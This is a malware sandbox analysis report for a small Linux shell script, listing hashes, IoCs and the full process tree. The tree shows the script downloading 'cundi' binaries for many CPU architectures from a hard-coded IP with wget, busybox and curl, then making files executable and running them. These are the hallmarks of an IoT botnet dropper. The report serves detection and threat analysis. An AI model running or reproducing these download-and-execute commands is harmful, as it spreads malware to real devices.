45f97331883d3199a2aa5e2fab4af2824da390e4dffa5d63bd41803314b2a854

Analysis

max time kernel
38s
max time network
130s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240226-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240226-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
06-03-2024 06:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

45f97331883d3199a2aa5e2fab4af2824da390e4dffa5d63bd41803314b2a854
Size

3KB
MD5

85889171bef98258134a12c9d2b9e471
SHA1

54f16c48dd43fdc61ab7e1eea4aef7da4a71888c
SHA256

45f97331883d3199a2aa5e2fab4af2824da390e4dffa5d63bd41803314b2a854
SHA512

5df64c99fe98994517ebad1bbeefc0ee3998899bb8c71efe34db488dd2fc498c967a9c5dafc142935097ff7780f67b56b8bb6fa483fdb28829c87039de2f04b2

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 15 IoCs

ioc	pid	Process
/tmp/kami	1538	kami
/tmp/kami	1552	kami
/tmp/kami	1569	kami
/tmp/kami	1576	kami
/tmp/kami	1583	kami
/tmp/kami	1590	kami
/tmp/kami	1597	kami
/tmp/kami	1604	kami
/tmp/kami	1611	kami
/tmp/kami	1618	kami
/tmp/kami	1627	kami
/tmp/kami	1634	kami
/tmp/kami	1641	kami
/tmp/kami	1648	kami
/tmp/kami	1655	kami

Writes file to tmp directory 16 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/cundi.i468	curl
File opened for modification	/tmp/cundi.spc	curl
File opened for modification	/tmp/kami	Process not Found
File opened for modification	/tmp/cundi.mips	curl
File opened for modification	/tmp/cundi.arc	curl
File opened for modification	/tmp/cundi.x86_64	curl
File opened for modification	/tmp/cundi.arm7	curl
File opened for modification	/tmp/cundi.m68k	curl
File opened for modification	/tmp/cundi.arm5	curl
File opened for modification	/tmp/cundi.ppc	curl
File opened for modification	/tmp/cundi.x86	curl
File opened for modification	/tmp/cundi.i686	curl
File opened for modification	/tmp/cundi.mpsl	curl
File opened for modification	/tmp/cundi.arm	curl
File opened for modification	/tmp/cundi.arm6	curl
File opened for modification	/tmp/cundi.sh4	curl

/tmp/45f97331883d3199a2aa5e2fab4af2824da390e4dffa5d63bd41803314b2a854
/tmp/45f97331883d3199a2aa5e2fab4af2824da390e4dffa5d63bd41803314b2a854
1⤵
PID:1528
- /usr/bin/wget
  wget http://103.47.195.200//cundi.x86
  2⤵
  PID:1529
- /bin/busybox
  /bin/busybox wget http://103.47.195.200//cundi.x86
  2⤵
  PID:1534
- /usr/bin/curl
  curl -O http://103.47.195.200//cundi.x86
  2⤵
  - Writes file to tmp directory
  PID:1535
- /bin/cat
  cat cundi.x86 play
  2⤵
  PID:1536
- /bin/chmod
  chmod +x 45f97331883d3199a2aa5e2fab4af2824da390e4dffa5d63bd41803314b2a854 config-err-hF4xaH cundi.x86 kami netplan_c639p5u7 snap-private-tmp ssh-GGYcwoqjNT1l systemd-private-9dd83effdddf420e8285d43c68fe03e2-bolt.service-Vo8uBc systemd-private-9dd83effdddf420e8285d43c68fe03e2-colord.service-LV8o1q systemd-private-9dd83effdddf420e8285d43c68fe03e2-fwupd.service-vjhqL5 systemd-private-9dd83effdddf420e8285d43c68fe03e2-ModemManager.service-rSeker systemd-private-9dd83effdddf420e8285d43c68fe03e2-systemd-resolved.service-Lm0ChD systemd-private-9dd83effdddf420e8285d43c68fe03e2-systemd-timedated.service-yb2U81
  2⤵
  PID:1537
- /tmp/kami
  ./kami play
  2⤵
  - Executes dropped EXE
  PID:1538
- /usr/bin/wget
  wget http://103.47.195.200//cundi.mips
  2⤵
  PID:1540
- /bin/busybox
  /bin/busybox wget http://103.47.195.200//cundi.mips
  2⤵
  PID:1548
- /usr/bin/curl
  curl -O http://103.47.195.200//cundi.mips
  2⤵
  - Writes file to tmp directory
  PID:1549
- /bin/cat
  cat cundi.mips play
  2⤵
  PID:1550
- /bin/chmod
  chmod +x 45f97331883d3199a2aa5e2fab4af2824da390e4dffa5d63bd41803314b2a854 config-err-hF4xaH cundi.mips cundi.x86 kami netplan_c639p5u7 snap-private-tmp ssh-GGYcwoqjNT1l systemd-private-9dd83effdddf420e8285d43c68fe03e2-bolt.service-Vo8uBc systemd-private-9dd83effdddf420e8285d43c68fe03e2-colord.service-LV8o1q systemd-private-9dd83effdddf420e8285d43c68fe03e2-fwupd.service-vjhqL5 systemd-private-9dd83effdddf420e8285d43c68fe03e2-ModemManager.service-rSeker systemd-private-9dd83effdddf420e8285d43c68fe03e2-systemd-resolved.service-Lm0ChD systemd-private-9dd83effdddf420e8285d43c68fe03e2-systemd-timedated.service-yb2U81
  2⤵
  PID:1551
- /tmp/kami
  ./kami play
  2⤵
  - Executes dropped EXE
  PID:1552
- /usr/bin/wget
  wget http://103.47.195.200//cundi.arc
  2⤵
  PID:1554
- /bin/busybox
  /bin/busybox wget http://103.47.195.200//cundi.arc
  2⤵
  PID:1555
- /usr/bin/curl
  curl -O http://103.47.195.200//cundi.arc
  2⤵
  - Writes file to tmp directory
  PID:1556
- /bin/cat
  cat cundi.arc play
  2⤵
  PID:1567
- /bin/chmod
  chmod +x 45f97331883d3199a2aa5e2fab4af2824da390e4dffa5d63bd41803314b2a854 config-err-hF4xaH cundi.arc cundi.mips cundi.x86 kami netplan_c639p5u7 snap-private-tmp ssh-GGYcwoqjNT1l systemd-private-9dd83effdddf420e8285d43c68fe03e2-bolt.service-Vo8uBc systemd-private-9dd83effdddf420e8285d43c68fe03e2-colord.service-LV8o1q systemd-private-9dd83effdddf420e8285d43c68fe03e2-fwupd.service-vjhqL5 systemd-private-9dd83effdddf420e8285d43c68fe03e2-ModemManager.service-rSeker systemd-private-9dd83effdddf420e8285d43c68fe03e2-systemd-resolved.service-Lm0ChD systemd-private-9dd83effdddf420e8285d43c68fe03e2-systemd-timedated.service-yb2U81
  2⤵
  PID:1568
- /tmp/kami
  ./kami play
  2⤵
  - Executes dropped EXE
  PID:1569
- /usr/bin/wget
  wget http://103.47.195.200//cundi.i468
  2⤵
  PID:1571
- /bin/busybox
  /bin/busybox wget http://103.47.195.200//cundi.i468
  2⤵
  PID:1572
- /usr/bin/curl
  curl -O http://103.47.195.200//cundi.i468
  2⤵
  - Writes file to tmp directory
  PID:1573
- /bin/cat
  cat cundi.i468 play
  2⤵
  PID:1574
- /bin/chmod
  chmod +x 45f97331883d3199a2aa5e2fab4af2824da390e4dffa5d63bd41803314b2a854 config-err-hF4xaH cundi.arc cundi.i468 cundi.mips cundi.x86 kami netplan_c639p5u7 snap-private-tmp ssh-GGYcwoqjNT1l systemd-private-9dd83effdddf420e8285d43c68fe03e2-bolt.service-Vo8uBc systemd-private-9dd83effdddf420e8285d43c68fe03e2-colord.service-LV8o1q systemd-private-9dd83effdddf420e8285d43c68fe03e2-fwupd.service-vjhqL5 systemd-private-9dd83effdddf420e8285d43c68fe03e2-ModemManager.service-rSeker systemd-private-9dd83effdddf420e8285d43c68fe03e2-systemd-resolved.service-Lm0ChD systemd-private-9dd83effdddf420e8285d43c68fe03e2-systemd-timedated.service-yb2U81
  2⤵
  PID:1575
- /tmp/kami
  ./kami play
  2⤵
  - Executes dropped EXE
  PID:1576
- /usr/bin/wget
  wget http://103.47.195.200//cundi.i686
  2⤵
  PID:1578
- /bin/busybox
  /bin/busybox wget http://103.47.195.200//cundi.i686
  2⤵
  PID:1579
- /usr/bin/curl
  curl -O http://103.47.195.200//cundi.i686
  2⤵
  - Writes file to tmp directory
  PID:1580
- /bin/cat
  cat cundi.i686 play
  2⤵
  PID:1581
- /bin/chmod
  chmod +x 45f97331883d3199a2aa5e2fab4af2824da390e4dffa5d63bd41803314b2a854 config-err-hF4xaH cundi.arc cundi.i468 cundi.i686 cundi.mips cundi.x86 kami netplan_c639p5u7 snap-private-tmp ssh-GGYcwoqjNT1l systemd-private-9dd83effdddf420e8285d43c68fe03e2-bolt.service-Vo8uBc systemd-private-9dd83effdddf420e8285d43c68fe03e2-colord.service-LV8o1q systemd-private-9dd83effdddf420e8285d43c68fe03e2-fwupd.service-vjhqL5 systemd-private-9dd83effdddf420e8285d43c68fe03e2-ModemManager.service-rSeker systemd-private-9dd83effdddf420e8285d43c68fe03e2-systemd-resolved.service-Lm0ChD systemd-private-9dd83effdddf420e8285d43c68fe03e2-systemd-timedated.service-yb2U81
  2⤵
  PID:1582
- /tmp/kami
  ./kami play
  2⤵
  - Executes dropped EXE
  PID:1583
- /usr/bin/wget
  wget http://103.47.195.200//cundi.x86_64
  2⤵
  PID:1585
- /bin/busybox
  /bin/busybox wget http://103.47.195.200//cundi.x86_64
  2⤵
  PID:1586
- /usr/bin/curl
  curl -O http://103.47.195.200//cundi.x86_64
  2⤵
  - Writes file to tmp directory
  PID:1587
- /bin/cat
  cat cundi.x86_64 play
  2⤵
  PID:1588
- /bin/chmod
  chmod +x 45f97331883d3199a2aa5e2fab4af2824da390e4dffa5d63bd41803314b2a854 config-err-hF4xaH cundi.arc cundi.i468 cundi.i686 cundi.mips cundi.x86 cundi.x86_64 kami netplan_c639p5u7 snap-private-tmp ssh-GGYcwoqjNT1l systemd-private-9dd83effdddf420e8285d43c68fe03e2-bolt.service-Vo8uBc systemd-private-9dd83effdddf420e8285d43c68fe03e2-colord.service-LV8o1q systemd-private-9dd83effdddf420e8285d43c68fe03e2-fwupd.service-vjhqL5 systemd-private-9dd83effdddf420e8285d43c68fe03e2-ModemManager.service-rSeker systemd-private-9dd83effdddf420e8285d43c68fe03e2-systemd-resolved.service-Lm0ChD systemd-private-9dd83effdddf420e8285d43c68fe03e2-systemd-timedated.service-yb2U81
  2⤵
  PID:1589
- /tmp/kami
  ./kami play
  2⤵
  - Executes dropped EXE
  PID:1590
- /usr/bin/wget
  wget http://103.47.195.200//cundi.mpsl
  2⤵
  PID:1592
- /bin/busybox
  /bin/busybox wget http://103.47.195.200//cundi.mpsl
  2⤵
  PID:1593
- /usr/bin/curl
  curl -O http://103.47.195.200//cundi.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1594
- /bin/cat
  cat cundi.mpsl play
  2⤵
  PID:1595
- /bin/chmod
  chmod +x 45f97331883d3199a2aa5e2fab4af2824da390e4dffa5d63bd41803314b2a854 config-err-hF4xaH cundi.arc cundi.i468 cundi.i686 cundi.mips cundi.mpsl cundi.x86 cundi.x86_64 kami netplan_c639p5u7 snap-private-tmp ssh-GGYcwoqjNT1l systemd-private-9dd83effdddf420e8285d43c68fe03e2-bolt.service-Vo8uBc systemd-private-9dd83effdddf420e8285d43c68fe03e2-colord.service-LV8o1q systemd-private-9dd83effdddf420e8285d43c68fe03e2-fwupd.service-vjhqL5 systemd-private-9dd83effdddf420e8285d43c68fe03e2-ModemManager.service-rSeker systemd-private-9dd83effdddf420e8285d43c68fe03e2-systemd-resolved.service-Lm0ChD systemd-private-9dd83effdddf420e8285d43c68fe03e2-systemd-timedated.service-yb2U81
  2⤵
  PID:1596
- /tmp/kami
  ./kami play
  2⤵
  - Executes dropped EXE
  PID:1597
- /usr/bin/wget
  wget http://103.47.195.200//cundi.arm
  2⤵
  PID:1599
- /bin/busybox
  /bin/busybox wget http://103.47.195.200//cundi.arm
  2⤵
  PID:1600
- /usr/bin/curl
  curl -O http://103.47.195.200//cundi.arm
  2⤵
  - Writes file to tmp directory
  PID:1601
- /bin/cat
  cat cundi.arm play
  2⤵
  PID:1602
- /bin/chmod
  chmod +x 45f97331883d3199a2aa5e2fab4af2824da390e4dffa5d63bd41803314b2a854 config-err-hF4xaH cundi.arc cundi.arm cundi.i468 cundi.i686 cundi.mips cundi.mpsl cundi.x86 cundi.x86_64 kami netplan_c639p5u7 snap-private-tmp ssh-GGYcwoqjNT1l systemd-private-9dd83effdddf420e8285d43c68fe03e2-bolt.service-Vo8uBc systemd-private-9dd83effdddf420e8285d43c68fe03e2-colord.service-LV8o1q systemd-private-9dd83effdddf420e8285d43c68fe03e2-fwupd.service-vjhqL5 systemd-private-9dd83effdddf420e8285d43c68fe03e2-ModemManager.service-rSeker systemd-private-9dd83effdddf420e8285d43c68fe03e2-systemd-resolved.service-Lm0ChD systemd-private-9dd83effdddf420e8285d43c68fe03e2-systemd-timedated.service-yb2U81
  2⤵
  PID:1603
- /tmp/kami
  ./kami play
  2⤵
  - Executes dropped EXE
  PID:1604
- /usr/bin/wget
  wget http://103.47.195.200//cundi.arm5
  2⤵
  PID:1606
- /bin/busybox
  /bin/busybox wget http://103.47.195.200//cundi.arm5
  2⤵
  PID:1607
- /usr/bin/curl
  curl -O http://103.47.195.200//cundi.arm5
  2⤵
  - Writes file to tmp directory
  PID:1608
- /bin/cat
  cat cundi.arm5 play
  2⤵
  PID:1609
- /bin/chmod
  chmod +x 45f97331883d3199a2aa5e2fab4af2824da390e4dffa5d63bd41803314b2a854 config-err-hF4xaH cundi.arc cundi.arm cundi.arm5 cundi.i468 cundi.i686 cundi.mips cundi.mpsl cundi.x86 cundi.x86_64 kami netplan_c639p5u7 snap-private-tmp ssh-GGYcwoqjNT1l systemd-private-9dd83effdddf420e8285d43c68fe03e2-bolt.service-Vo8uBc systemd-private-9dd83effdddf420e8285d43c68fe03e2-colord.service-LV8o1q systemd-private-9dd83effdddf420e8285d43c68fe03e2-fwupd.service-vjhqL5 systemd-private-9dd83effdddf420e8285d43c68fe03e2-ModemManager.service-rSeker systemd-private-9dd83effdddf420e8285d43c68fe03e2-systemd-resolved.service-Lm0ChD systemd-private-9dd83effdddf420e8285d43c68fe03e2-systemd-timedated.service-yb2U81
  2⤵
  PID:1610
- /tmp/kami
  ./kami play
  2⤵
  - Executes dropped EXE
  PID:1611
- /usr/bin/wget
  wget http://103.47.195.200//cundi.arm6
  2⤵
  PID:1613
- /bin/busybox
  /bin/busybox wget http://103.47.195.200//cundi.arm6
  2⤵
  PID:1614
- /usr/bin/curl
  curl -O http://103.47.195.200//cundi.arm6
  2⤵
  - Writes file to tmp directory
  PID:1615
- /bin/cat
  cat cundi.arm6 play
  2⤵
  PID:1616
- /bin/chmod
  chmod +x 45f97331883d3199a2aa5e2fab4af2824da390e4dffa5d63bd41803314b2a854 config-err-hF4xaH cundi.arc cundi.arm cundi.arm5 cundi.arm6 cundi.i468 cundi.i686 cundi.mips cundi.mpsl cundi.x86 cundi.x86_64 kami netplan_c639p5u7 snap-private-tmp ssh-GGYcwoqjNT1l systemd-private-9dd83effdddf420e8285d43c68fe03e2-bolt.service-Vo8uBc systemd-private-9dd83effdddf420e8285d43c68fe03e2-colord.service-LV8o1q systemd-private-9dd83effdddf420e8285d43c68fe03e2-fwupd.service-vjhqL5 systemd-private-9dd83effdddf420e8285d43c68fe03e2-ModemManager.service-rSeker systemd-private-9dd83effdddf420e8285d43c68fe03e2-systemd-resolved.service-Lm0ChD systemd-private-9dd83effdddf420e8285d43c68fe03e2-systemd-timedated.service-yb2U81
  2⤵
  PID:1617
- /tmp/kami
  ./kami play
  2⤵
  - Executes dropped EXE
  PID:1618
- /usr/bin/wget
  wget http://103.47.195.200//cundi.arm7
  2⤵
  PID:1620
- /bin/busybox
  /bin/busybox wget http://103.47.195.200//cundi.arm7
  2⤵
  PID:1621
- /usr/bin/curl
  curl -O http://103.47.195.200//cundi.arm7
  2⤵
  - Writes file to tmp directory
  PID:1624
- /bin/cat
  cat cundi.arm7 play
  2⤵
  PID:1625
- /bin/chmod
  chmod +x 45f97331883d3199a2aa5e2fab4af2824da390e4dffa5d63bd41803314b2a854 config-err-hF4xaH cundi.arc cundi.arm cundi.arm5 cundi.arm6 cundi.arm7 cundi.i468 cundi.i686 cundi.mips cundi.mpsl cundi.x86 cundi.x86_64 kami netplan_c639p5u7 snap-private-tmp ssh-GGYcwoqjNT1l systemd-private-9dd83effdddf420e8285d43c68fe03e2-bolt.service-Vo8uBc systemd-private-9dd83effdddf420e8285d43c68fe03e2-colord.service-LV8o1q systemd-private-9dd83effdddf420e8285d43c68fe03e2-fwupd.service-vjhqL5 systemd-private-9dd83effdddf420e8285d43c68fe03e2-ModemManager.service-rSeker systemd-private-9dd83effdddf420e8285d43c68fe03e2-systemd-resolved.service-Lm0ChD
  2⤵
  PID:1626
- /tmp/kami
  ./kami play
  2⤵
  - Executes dropped EXE
  PID:1627
- /usr/bin/wget
  wget http://103.47.195.200//cundi.ppc
  2⤵
  PID:1629
- /bin/busybox
  /bin/busybox wget http://103.47.195.200//cundi.ppc
  2⤵
  PID:1630
- /usr/bin/curl
  curl -O http://103.47.195.200//cundi.ppc
  2⤵
  - Writes file to tmp directory
  PID:1631
- /bin/cat
  cat cundi.ppc play
  2⤵
  PID:1632
- /bin/chmod
  chmod +x 45f97331883d3199a2aa5e2fab4af2824da390e4dffa5d63bd41803314b2a854 config-err-hF4xaH cundi.arc cundi.arm cundi.arm5 cundi.arm6 cundi.arm7 cundi.i468 cundi.i686 cundi.mips cundi.mpsl cundi.ppc cundi.x86 cundi.x86_64 kami netplan_c639p5u7 snap-private-tmp ssh-GGYcwoqjNT1l systemd-private-9dd83effdddf420e8285d43c68fe03e2-bolt.service-Vo8uBc systemd-private-9dd83effdddf420e8285d43c68fe03e2-colord.service-LV8o1q systemd-private-9dd83effdddf420e8285d43c68fe03e2-fwupd.service-vjhqL5 systemd-private-9dd83effdddf420e8285d43c68fe03e2-ModemManager.service-rSeker systemd-private-9dd83effdddf420e8285d43c68fe03e2-systemd-resolved.service-Lm0ChD
  2⤵
  PID:1633
- /tmp/kami
  ./kami play
  2⤵
  - Executes dropped EXE
  PID:1634
- /usr/bin/wget
  wget http://103.47.195.200//cundi.spc
  2⤵
  PID:1636
- /bin/busybox
  /bin/busybox wget http://103.47.195.200//cundi.spc
  2⤵
  PID:1637
- /usr/bin/curl
  curl -O http://103.47.195.200//cundi.spc
  2⤵
  - Writes file to tmp directory
  PID:1638
- /bin/cat
  cat cundi.spc play
  2⤵
  PID:1639
- /bin/chmod
  chmod +x 45f97331883d3199a2aa5e2fab4af2824da390e4dffa5d63bd41803314b2a854 config-err-hF4xaH cundi.arc cundi.arm cundi.arm5 cundi.arm6 cundi.arm7 cundi.i468 cundi.i686 cundi.mips cundi.mpsl cundi.ppc cundi.spc cundi.x86 cundi.x86_64 kami netplan_c639p5u7 snap-private-tmp ssh-GGYcwoqjNT1l systemd-private-9dd83effdddf420e8285d43c68fe03e2-bolt.service-Vo8uBc systemd-private-9dd83effdddf420e8285d43c68fe03e2-colord.service-LV8o1q systemd-private-9dd83effdddf420e8285d43c68fe03e2-fwupd.service-vjhqL5 systemd-private-9dd83effdddf420e8285d43c68fe03e2-ModemManager.service-rSeker systemd-private-9dd83effdddf420e8285d43c68fe03e2-systemd-resolved.service-Lm0ChD
  2⤵
  PID:1640
- /tmp/kami
  ./kami play
  2⤵
  - Executes dropped EXE
  PID:1641
- /usr/bin/wget
  wget http://103.47.195.200//cundi.m68k
  2⤵
  PID:1643
- /bin/busybox
  /bin/busybox wget http://103.47.195.200//cundi.m68k
  2⤵
  PID:1644
- /usr/bin/curl
  curl -O http://103.47.195.200//cundi.m68k
  2⤵
  - Writes file to tmp directory
  PID:1645
- /bin/cat
  cat cundi.m68k play
  2⤵
  PID:1646
- /bin/chmod
  chmod +x 45f97331883d3199a2aa5e2fab4af2824da390e4dffa5d63bd41803314b2a854 config-err-hF4xaH cundi.arc cundi.arm cundi.arm5 cundi.arm6 cundi.arm7 cundi.i468 cundi.i686 cundi.m68k cundi.mips cundi.mpsl cundi.ppc cundi.spc cundi.x86 cundi.x86_64 kami netplan_c639p5u7 snap-private-tmp ssh-GGYcwoqjNT1l systemd-private-9dd83effdddf420e8285d43c68fe03e2-bolt.service-Vo8uBc systemd-private-9dd83effdddf420e8285d43c68fe03e2-colord.service-LV8o1q systemd-private-9dd83effdddf420e8285d43c68fe03e2-fwupd.service-vjhqL5 systemd-private-9dd83effdddf420e8285d43c68fe03e2-ModemManager.service-rSeker systemd-private-9dd83effdddf420e8285d43c68fe03e2-systemd-resolved.service-Lm0ChD
  2⤵
  PID:1647
- /tmp/kami
  ./kami play
  2⤵
  - Executes dropped EXE
  PID:1648
- /usr/bin/wget
  wget http://103.47.195.200//cundi.sh4
  2⤵
  PID:1650
- /bin/busybox
  /bin/busybox wget http://103.47.195.200//cundi.sh4
  2⤵
  PID:1651
- /usr/bin/curl
  curl -O http://103.47.195.200//cundi.sh4
  2⤵
  - Writes file to tmp directory
  PID:1652
- /bin/cat
  cat cundi.sh4 play
  2⤵
  PID:1653
- /bin/chmod
  chmod +x 45f97331883d3199a2aa5e2fab4af2824da390e4dffa5d63bd41803314b2a854 config-err-hF4xaH cundi.arc cundi.arm cundi.arm5 cundi.arm6 cundi.arm7 cundi.i468 cundi.i686 cundi.m68k cundi.mips cundi.mpsl cundi.ppc cundi.sh4 cundi.spc cundi.x86 cundi.x86_64 kami netplan_c639p5u7 snap-private-tmp ssh-GGYcwoqjNT1l systemd-private-9dd83effdddf420e8285d43c68fe03e2-bolt.service-Vo8uBc systemd-private-9dd83effdddf420e8285d43c68fe03e2-colord.service-LV8o1q systemd-private-9dd83effdddf420e8285d43c68fe03e2-fwupd.service-vjhqL5 systemd-private-9dd83effdddf420e8285d43c68fe03e2-ModemManager.service-rSeker systemd-private-9dd83effdddf420e8285d43c68fe03e2-systemd-resolved.service-Lm0ChD
  2⤵
  PID:1654
- /tmp/kami
  ./kami play
  2⤵
  - Executes dropped EXE
  PID:1655

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/cundi.x86

Filesize
10B

MD5
7605968e79d0ca095ab1231486d2b814

SHA1
a007b420d19ceefa840f0373e050e3b51a4ab480

SHA256
493fda53120050f85836032324409be6c6484f90a0755ae0c6a673ba7626818b

SHA512
769249da7ed6c6bf5671bbc2371a6453b433226ceb8c4c2aa3604000d66647bcec83dee1ab64c0262fa40f923d77e23bad2c47274d339effc51d904ce77072a6

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads